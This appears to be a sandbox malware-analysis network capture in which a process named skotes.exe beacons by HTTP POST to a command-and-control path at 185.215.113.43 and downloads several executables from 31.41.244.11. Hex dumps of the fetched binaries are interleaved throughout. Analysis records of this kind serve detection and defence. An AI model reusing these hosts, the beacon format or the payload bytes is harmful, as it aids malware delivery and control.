                                                                                                                                                              Dec 18, 2024 11:47:13.770423889 CET1236INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                              Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3D$tlA
                                                                                                                                                              Dec 18, 2024 11:47:13.770458937 CET1236INData Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5
                                                                                                                                                              Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
                                                                                                                                                              Dec 18, 2024 11:47:13.770659924 CET672INData Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c
                                                                                                                                                              Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
                                                                                                                                                              Dec 18, 2024 11:47:13.770677090 CET1236INData Raw: 8b 45 10 89 38 e9 fb fd ff ff 8b 3e ff 15 98 a1 41 00 50 6a 69 56 ff 57 20 e9 e5 fd ff ff 8b 45 10 89 38 ff 75 f0 e8 30 74 01 00 59 8d 4d c4 e8 31 07 01 00 33 c0 eb 1d 8b 06 6a 64 56 ff 50 1c ff 75 f0 8b f0 e8 11 74 01 00 59 8d 4d c4 e8 12 07 01
                                                                                                                                                              Data Ascii: E8>APjiVW E8u0tYM13jdVPutYM^_[Vjt$Au0A;tPA3^t$AtuV3@^<uA< t<tt<t33@UQEjEEPjEPjEEAPA
                                                                                                                                                              Dec 18, 2024 11:47:13.770690918 CET224INData Raw: 75 08 ff 15 9c a2 41 00 85 c0 0f 84 2d 01 00 00 68 f8 a5 41 00 8d 45 98 50 ff 15 48 a1 41 00 85 c0 0f 85 16 01 00 00 6a f0 ff 75 08 ff 15 7c a2 41 00 a8 0e 0f 84 03 01 00 00 8d 45 f8 50 ff 75 08 ff 15 80 a2 41 00 0f b7 c0 50 68 f0 a5 41 00 e8 87
                                                                                                                                                              Data Ascii: uA-hAEPHAju|AEPuAPhA3;}uj@LAuSWRoVdAEPVW\A9uEPh4AVVuPAEPQWPAE;tfURu
                                                                                                                                                              Dec 18, 2024 11:47:13.771532059 CET1236INData Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33
                                                                                                                                                              Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
                                                                                                                                                              Dec 18, 2024 11:47:13.771578074 CET1236INData Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c
                                                                                                                                                              Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B|2_^[Ar91|S\$VWu33|$Gt$P$AtF;w|3_^[t3GVt$W39~~(Ft$P$AujWPOG;~
                                                                                                                                                              Dec 18, 2024 11:47:13.771591902 CET448INData Raw: 37 00 89 75 f4 e8 ec fd ff ff 57 e8 ef 64 01 00 59 5f 8b 45 08 5e 5b c9 c2 0c 00 53 56 8b 74 24 0c 57 8b f9 8b 47 04 39 06 7e 02 89 06 8b 5c 24 14 53 e8 d0 e6 ff ff 8b 06 50 03 c3 50 8b cf e8 ec fa ff ff 5f 5e 5b c2 08 00 8b 44 24 08 ff 30 8b 44
                                                                                                                                                              Data Ascii: 7uWdY_E^[SVt$WG9~\$SPP_^[D$0D$0YY@W|$D$xt.SVpFPVPVSjt$,8Af$A^G[_USVuE39Xt2WxS?ESAPQNPWuSuA
                                                                                                                                                              Dec 18, 2024 11:47:13.771859884 CET1236INData Raw: 89 5d f0 eb 03 8b 7d 08 8b 07 8d 4d e4 51 b9 00 10 00 00 2b ce 51 8d 8c 35 e0 ef ff ff 51 57 ff 50 0c 85 c0 0f 85 ca 00 00 00 8b 45 e4 3b c3 0f 84 bf 00 00 00 03 f0 8d 85 e0 ef ff ff 33 ff 89 45 f8 38 5d ff 8b c6 74 3d 2b 45 e8 3b f8 77 60 ff 75
                                                                                                                                                              Data Ascii: ]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+E;w#uuubuEEE+}V=]PP<A9]w}"M39Y
                                                                                                                                                              Dec 18, 2024 11:47:13.890094042 CET1236INData Raw: 01 50 50 8b cf e8 97 f6 ff ff 50 ff 74 24 18 ff 15 c4 a2 41 00 8b 07 66 83 24 70 00 89 77 04 8b c7 5f 5e c3 55 8b ec 83 ec 74 53 56 8b 75 08 57 6a 40 8d 45 8c 50 56 ff 15 9c a2 41 00 85 c0 74 49 68 f8 a5 41 00 8d 45 8c 50 ff 15 48 a1 41 00 85 c0
                                                                                                                                                              Data Ascii: PPPt$Af$pw_^UtSVuWj@EPVAtIhAEPHAu6jV|Au)EVPvjhAutu]Y3_^[VA3;EthAhAEPVYYVAhAE+ESSWuPE+EPuuhPhAh


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.649833185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:23.586057901 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 31
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 36 38 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                              Data Ascii: d1=1016875001&unit=246122658369
                                                                                                                                                              Dec 18, 2024 11:47:25.561048031 CET193INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:25 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.64983731.41.244.11806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:25.715697050 CET62OUTGET /files/unique3/random.exe HTTP/1.1
                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:27.141222000 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:26 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 1960448
                                                                                                                                                              Last-Modified: Wed, 18 Dec 2024 10:37:12 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6762a5d8-1dea00"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 d0 4a 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z)))()()()()()()()))))9()9))9()Rich)PEL_{_d%|^J@K|@Vjl <@.rsrclL@.idata T@ `)V@ocizazujpP1lX@tmlfxogwJ@.taggant0J"@
                                                                                                                                                              Dec 18, 2024 11:47:27.141249895 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Dec 18, 2024 11:47:27.141292095 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Dec 18, 2024 11:47:27.141340971 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Dec 18, 2024 11:47:27.141354084 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Dec 18, 2024 11:47:27.141437054 CET672INData Raw: 40 d1 0e 58 48 1a 15 f9 cb 02 9f 5e a0 68 44 21 bd 34 15 4a 31 93 90 59 52 bd 7d 5e 36 74 ba f9 f1 be 74 a9 7a 41 8f 5b 10 3a c4 fd da f1 9d b1 02 72 bc 6e 2d 13 39 f9 9c 61 19 bf c0 58 9d e6 35 96 92 57 8d cd a3 4d 88 89 24 b8 ad 1e d3 36 8b f9
                                                                                                                                                              Data Ascii: @XH^hD!4J1YR}^6ttzA[:rn-9aX5WM$68MjC+Y$\0H#A`\ucOKZt/6TY(t'ltTreVY$_=0GJH'0moY-|=LX`5Vm.
                                                                                                                                                              Dec 18, 2024 11:47:27.141449928 CET1236INData Raw: fb 22 15 d7 be 7a c3 a8 0c 69 b9 b8 cc 03 d3 0f a1 a9 7c c5 db db b1 9a 7d 6e c9 67 da eb a4 69 1b 8f 23 9a 17 68 bb 91 34 30 67 97 f9 1f 49 dd 9a 83 eb 53 5c 18 ff b4 e3 ec a0 61 49 4a 75 27 04 28 1d 93 c0 66 5c 99 3f ca 74 b3 51 8c dc 58 24 ad
                                                                                                                                                              Data Ascii: "zi|}ngi#h40gIS\aIJu'(f\?tQX$0:NYHM]bBq]OXV3'NSX,Vn$dl5`cv8":'"/6m[_>zgi1CuzeteTue.$B+r
                                                                                                                                                              Dec 18, 2024 11:47:27.141562939 CET224INData Raw: cd 27 a5 f9 55 8f bf 70 19 42 1b dd cc 10 4f 4d fd b2 44 84 2d cf b4 86 9d 3c db 46 88 58 e1 e5 45 b5 bc 56 84 f1 a3 47 34 f4 c3 58 8c 72 52 b3 f1 66 1c 0f dc 13 b2 6a cc 6e 17 11 5a ae a4 76 cd 8f 9a f7 2d de 8c eb d4 30 58 9b 60 a1 48 dd b3 e5
                                                                                                                                                              Data Ascii: 'UpBOMD-<FXEVG4XrRfjnZv-0X`H\]ABZehhKY$0YH{s[X`__*($:*uE't:*r=@TI&I'<t.t`Y
                                                                                                                                                              Dec 18, 2024 11:47:27.141573906 CET1236INData Raw: e2 d0 d5 c7 cd b2 ba d1 78 0e 32 fa bb 25 dc b3 d6 d2 c6 cc 62 9d c3 6e 3e 53 79 4b 47 61 ae 17 6b f1 21 a6 c6 27 bc 29 d7 17 8f 55 18 51 6c f5 c8 d0 47 57 40 b2 27 d1 75 ea 81 92 bc 45 45 1e d6 38 d1 ca 8b 60 39 75 a6 df 31 93 3b 74 df a8 5c d5
                                                                                                                                                              Data Ascii: x2%bn>SyKGak!')UQlGW@'uEE8`9u1;t\tX5"6ulITjd:?jaa3B-oSX]jVI>4LSS1e410SaD}bTn`as,iaARx6hwn.$0}09H
                                                                                                                                                              Dec 18, 2024 11:47:27.141585112 CET224INData Raw: b6 e1 57 78 8a 58 77 e6 ef 96 b8 56 f7 90 99 9f 34 b0 c3 08 71 cd 53 28 76 bc 42 ee 5d e2 aa 85 6e 98 64 1b d6 e5 b8 8d c8 e1 02 57 f2 5d 52 6d f2 22 8b a4 41 1e d1 4e 26 78 cf 75 c4 0e 8e 93 5c 74 eb 42 50 13 75 48 8e 6d 8e 99 18 da 1e 29 a0 d0
                                                                                                                                                              Data Ascii: WxXwV4qS(vB]ndW]Rm"AN&xu\tBPuHm)k|f:<r&chnj}x]\?700u7Iek@'cJWVgt4-T
                                                                                                                                                              Dec 18, 2024 11:47:27.261195898 CET1236INData Raw: 34 e2 ac ee da d5 3b 9b d0 68 a7 d9 56 35 15 fd a6 d8 c2 59 24 5c 2f 6c b1 30 16 24 0b 01 49 dd 00 5d e9 ca 5c 2c a3 2d b4 ec cc 59 a9 1c b3 15 4f bd bd 49 a0 68 72 1b 86 4b 15 fb 7a c1 20 59 24 34 43 8a 96 30 c9 c7 eb e3 48 dd e0 5a 62 ef 5c 78
                                                                                                                                                              Data Ascii: 4;hV5Y$\/l0$I]\,-YOIhrKz Y$4C0HZb\x7X+jh>(n*PY$iC0?hH\;P$hu^Q/[-zceXCV3oS4a#toYz M--g3s%X@nTP~@$Jw


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.649855185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:32.785681963 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 31
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 36 38 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                              Data Ascii: d1=1016876001&unit=246122658369
                                                                                                                                                              Dec 18, 2024 11:47:34.121493101 CET193INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:33 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.64985931.41.244.11806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:34.243125916 CET59OUTGET /files/dodo/random.exe HTTP/1.1
                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.564080954 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:35 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 765568
                                                                                                                                                              Last-Modified: Tue, 17 Dec 2024 09:46:16 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "67614868-bae80"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bss`@
                                                                                                                                                              Dec 18, 2024 11:47:35.564110041 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              Dec 18, 2024 11:47:35.564121962 CET1236INData Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24
                                                                                                                                                              Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"|$$D$(WVt$VfSCErPPD$|$$l$(WVPe\$Dl$t$h5Vm
                                                                                                                                                              Dec 18, 2024 11:47:35.564208031 CET1236INData Raw: f0 68 6d 64 85 93 ff 35 6c 64 42 00 e8 16 fb ff ff 83 c4 08 89 45 e4 8b 55 e4 ff d2 bb 49 05 00 00 be 11 50 42 00 6a 11 68 00 50 42 00 53 56 e8 96 fc ff ff 83 c4 10 6a 0a 68 00 c0 41 00 57 8b 7d 08 57 e8 82 fc ff ff 83 c4 10 68 01 dc af 8a ff 35
                                                                                                                                                              Data Ascii: hmd5ldBEUIPBjhPBSVjhAW}Wh5ldBMQj@SVuM11^_[]}uVPB'jT9BUSWV,\$@WB1D$(d=0w@ldBhb-/5ldBE(AD$
                                                                                                                                                              Dec 18, 2024 11:47:35.564220905 CET1236INData Raw: 42 00 31 e0 89 44 24 08 8b 01 8b 40 04 8b 7c 01 38 85 ff 74 48 89 e3 89 d9 56 e8 1a ff ff ff 80 7b 04 00 74 31 8b 07 89 f9 ff 50 34 83 f8 ff 0f 94 c0 8b 0e 8b 51 04 8d 0c 16 83 7c 16 38 00 0f 94 c4 08 c4 0f b6 c4 c1 e0 02 0b 44 16 0c 6a 00 50 e8
                                                                                                                                                              Data Ascii: B1D$@|8tHV{t1P4Q|8DjPnL$1^_[WV D$,WB1T$A#AuL$1 ^_|$0t1PP?BBDBD@Bt$RWhABV?
                                                                                                                                                              Dec 18, 2024 11:47:35.564232111 CET1236INData Raw: 78 01 81 ff 00 10 00 00 72 14 8b 51 fc 83 c1 fc 29 d1 83 f9 20 73 33 83 c0 24 89 c7 89 d1 57 51 e8 49 0a 00 00 83 c4 08 c7 06 5c c3 41 00 8b 4c 24 18 31 e1 e8 74 0a 00 00 89 f0 83 c4 1c 5e 5f 5b 5d c2 0c 00 e8 fd f8 ff ff e8 00 95 00 00 55 89 e5
                                                                                                                                                              Data Ascii: xrQ) s3$WQI\AL$1t^_[]USWV0WB1EUP WCWCzzrMw{C JUCE@rP|P\C{MK GWuP
                                                                                                                                                              Dec 18, 2024 11:47:35.564356089 CET1236INData Raw: 00 00 00 83 c4 04 8b 10 89 c1 56 ff 52 20 89 c3 8b 4f 04 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 89 c1 6a 01 ff 12 8b 4c 24 08 31 e1 e8 a6 05 00 00 89 d8 83 c4 0c 5e 5f 5b c2 04 00 53 57 56 83 ec 0c 8b 74 24 1c a1 c0 57 42 00 31 e0 89 44 24
                                                                                                                                                              Data Ascii: VR OtPtjL$1^_[SWVt$WB1D$L$j|dB$eBdPu3u-VPt94$VP<$=|dBL$bL$1^_[WVWB1D$9u&j
                                                                                                                                                              Dec 18, 2024 11:47:35.564368010 CET1236INData Raw: 68 6a b8 41 00 e8 be 01 00 00 59 c3 56 57 6a 01 e8 33 5e 00 00 59 bf 10 66 42 00 8b f0 8b cf e8 0d 0f 00 00 6a 00 56 8b cf c7 05 10 66 42 00 cc cb 41 00 e8 69 1a 00 00 68 74 b8 41 00 e8 86 01 00 00 59 5f 5e c3 6a 01 6a 00 68 10 66 42 00 b9 c0 65
                                                                                                                                                              Data Ascii: hjAYVWj3^YfBjVfBAihtAY_^jjhfBeBh~AeYeBiBhAEYhA9YUueYtu(Yt]} 1UuY]UEV AtjVYY^
                                                                                                                                                              Dec 18, 2024 11:47:35.564378977 CET1236INData Raw: 01 8b 45 08 89 41 04 89 0d a4 65 42 00 c9 c3 e8 0a 04 00 00 cc 56 57 8b 79 04 8b 07 8b 70 08 8b ce ff 15 10 37 42 00 8b cf ff d6 8b f8 85 ff 74 12 8b 0f 6a 01 8b 31 8b ce ff 15 10 37 42 00 8b cf ff d6 5f 5e c3 56 eb 15 8b 06 8b ce a3 a4 65 42 00
                                                                                                                                                              Data Ascii: EAeBVWyp7Btj17B_^VeBV0Y5eBu^UVjjuYYSBEQN$AEtPjlYYBEQN,^]UEx$tp$j>YY]USW}9;t>;t3Y#t*
                                                                                                                                                              Dec 18, 2024 11:47:35.564393044 CET1236INData Raw: ff c7 06 60 cb 41 00 8b c6 5e c9 c2 04 00 55 8b ec 56 ff 75 08 8b f1 e8 93 e6 ff ff c7 06 60 cb 41 00 8b c6 5e 5d c2 04 00 55 8b ec 51 56 ff 75 08 8b f1 89 75 fc e8 b1 fe ff ff c7 06 a8 c3 41 00 8b c6 5e c9 c2 04 00 83 61 04 00 8b c1 83 61 08 00
                                                                                                                                                              Data Ascii: `A^UVu`A^]UQVuuA^aaAB$AUEM#P+w]{AQvRPPQEAQvPRPQ+UE9EtQvPuRQ]UUv<=At3
                                                                                                                                                              Dec 18, 2024 11:47:35.683933020 CET1236INData Raw: ff 75 08 8b 40 04 c7 04 06 7c cb 41 00 8b 06 8b 48 04 8d 41 f8 89 44 31 fc 8b 06 8b 48 04 03 ce e8 d7 fe ff ff 8b c6 e8 e1 1b 00 00 c2 0c 00 55 8b ec 56 8d 71 f8 8b ce e8 17 00 00 00 f6 45 08 01 74 0a 6a 50 56 e8 ff f1 ff ff 59 59 8b c6 5e 5d c2
                                                                                                                                                              Data Ascii: u@|AHAD1HUVqEtjPVYY^]UjhAdPWB3PEdQ@D|AHADeRlAYMdYjA3Aj^^^^^^^^ ^$^(^,^0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.649873185.215.113.43806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:39.493190050 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                              Content-Length: 31
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 36 38 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                              Data Ascii: d1=1016877001&unit=246122658369
                                                                                                                                                              Dec 18, 2024 11:47:41.298697948 CET193INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:41 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.64987831.41.244.11806044C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Dec 18, 2024 11:47:41.422080994 CET62OUTGET /files/unique1/random.exe HTTP/1.1
                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:42.741074085 CET1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Wed, 18 Dec 2024 10:47:42 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 4466688
                                                                                                                                                              Last-Modified: Wed, 18 Dec 2024 10:17:55 GMT
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              ETag: "6762a153-442800"
                                                                                                                                                              Accept-Ranges: bytes
